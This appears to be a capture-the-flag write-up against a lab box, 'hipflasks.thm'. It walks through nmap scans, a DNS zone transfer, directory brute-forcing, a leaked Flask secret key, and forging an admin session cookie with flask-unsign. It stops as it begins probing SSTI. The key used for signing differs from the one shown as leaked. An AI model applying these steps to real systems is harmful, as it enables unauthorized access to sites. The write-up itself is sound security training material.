# Enumeration
- Box doesn't respond to ping
## NMAP SCAN
```nmap
PORT    STATE SERVICE  VERSION  
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   3072 b3:a6:01:96:89:7b:a3:69:ac:77:4f:dd:0a:01:9c:3a (RSA)  
|   256 98:dc:c9:95:54:b0:23:86:de:0e:fc:64:e6:b7:17:83 (ECDSA)  
|_  256 cd:38:c7:71:56:c1:bb:f3:3d:99:b6:ba:6f:47:f3:95 (ED25519)  
53/tcp  open  domain   (unknown banner: Now why would you need this..?)  
| dns-nsid:    
|_  bind.version: Now why would you need this..?  
| fingerprint-strings:    
|   DNSVersionBindReqTCP:    
|     version  
|     bind  
|_    would you need this..?  
80/tcp  open  http     nginx 1.18.0 (Ubuntu)  
|_http-title: Site doesn't have a title (application/octet-stream, text/plain).  
|_http-server-header: nginx/1.18.0 (Ubuntu)  
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)  
|_http-title: Site doesn't have a title (application/octet-stream, text/plain).  
| ssl-cert: Subject: commonName=hipflasks.thm/organizationName=Hip Flasks Inc/stateOrProvinceName=Argyll and Bute/countryName=GB  
| Not valid before: 2021-09-09T04:35:33  
|_Not valid after:  2022-09-09T04:35:33  
|_ssl-date: TLS randomness does not represent time  
| tls-nextprotoneg:    
|_  http/1.1  
|_http-server-header: nginx/1.18.0 (Ubuntu)  
| tls-alpn:    
|_  http/1.1  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
SF-Port53-TCP:V=7.92%I=7%D=9/9%Time=613A0095%P=x86_64-pc-linux-gnu%r(DNSVe  
SF:rsionBindReqTCP,4B,"\0I\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07version\x04b  
SF:ind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x1f\x1eNow\x20why\x20wo  
SF:uld\x20you\x20need\x20this\.\.\?");  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## NMAP SCAN (UDP)
```nmap
PORT     STATE         SERVICE  REASON
53/udp   open          domain   udp-response ttl 63
68/udp   open|filtered dhcpc    no-response
631/udp  open|filtered ipp      no-response
5353/udp open|filtered zeroconf no-response
```
- Possible firewall?

## Web (Port 80)
`Host Name: 10.10.160.153, not found.
This server hosts sites on the hipflasks.thm domain.`
- Add to /etc/hosts
- Now it's returning
`Host Name: hipflasks.thm, not found.
This server hosts sites on the hipflasks.thm domain.`


## Subdomain
- Check for zone transfer.
`dig axfr hipflasks.thm @10.10.160.153`
```bash
; <<>> DiG 9.16.15-Debian <<>> axfr hipflasks.thm @10.10.160.153
;; global options: +cmd
hipflasks.thm.          86400   IN      SOA     ns1.hipflasks.thm. localhost. 1 604800 86400 2419200 86400
hipflasks.thm.          86400   IN      NS      ns1.hipflasks.thm.
hipflasks.thm.          86400   IN      NS      localhost.
hipper.hipflasks.thm.   86400   IN      A       10.10.160.153
www.hipper.hipflasks.thm. 86400 IN      A       10.10.160.153
ns1.hipflasks.thm.      86400   IN      A       10.10.160.153
hipflasks.thm.          86400   IN      SOA     ns1.hipflasks.thm. localhost. 1 604800 86400 2419200 86400
;; Query time: 204 msec
;; SERVER: 10.10.160.153#53(10.10.160.153)
;; WHEN: Kha Sep 09 20:49:37 +08 2021
;; XFR size: 7 records (messages 1, bytes 242)
```
- Possible subdomain `hipper.hipflasks.thm`.
### Subdomain hipper
- Directories found by source code
```bash
/assets
/css
/js
```
- Response headers
```bash
HTTP/1.1 200 OK
Date: Thu, 09 Sep 2021 04:54:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: waitress
Vary: Cookie
Front-End-Https: on
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
```
- Server is `waitress`?
- We have a session cookie
`session:eyJ2aXNpdGVkIjoiVHJ1ZSJ9.YTmTBA.SsAqTIdXLIDQ94vpWKcaqwSb7TA`
- Looks like JWT token.
- Check SSL certificate for information
#### Feroxbuster
- Found interesting endpoints.
```bash
308 4l       24w      274c https://hipper.hipflasks.thm/admin
200 37l       81w      862c https://hipper.hipflasks.thm/main.py
```
- Possible source code disclosure.
- Found secret key, forge flask cookies is possible now.
```py
app.config["SECRET_KEY"] = "c213bd5034afbcc1a423fbdd1f78b178"
```
- It is also importing some modules
```py
from modules import abp
from libs.db import AuthConn, StatsConn
```
- modules doesn't sound like normal python library, we can check by curl `https://$ip/modules.py or https://$ip/modules//__init__.py`
```bash
from modules.admin import abp
```
It is importing admin.py
- We can also get the source code libs.db and libs.auth

# Exploit
- Since we have the cookie and the key we can forge the cookie.
- Looking at admin.py, we require two parameters in our cookie.
```py
session["auth"] = "True"; session["username"] = body["username"]
```
- I'll be using flask-unsign to forge the cookies.
```py
flask-unsign --sign --cookie "{'auth':True,'username':'Pentester'}" --secret '433d7c48f3578306f0ec9795e0f09d20'
eyJhdXRoIjoiVHJ1ZSIsInVzZXJuYW1lIjoiUGVudGVzdGVyIn0.YTmv1w.g2qaa2CZ50LDDAcJxQyYIMfHKFE
```
- And simply just change the cookie and we should be in.
- Not much we can do, since we're using Flask maybe SSTI?

## SSTI
- Only the username and views are using Jinja2 templates
```html
                        <h2 class="section-heading mb-4">
                            <span class="section-heading-upper">Admin Console</span>
                            <span class="section-heading-lower">Welcome, {session['username']}</span>
                        </h2>
                        <p class="mb-3">There have been {uniqueViews} unique visitors to the site!</p>
```
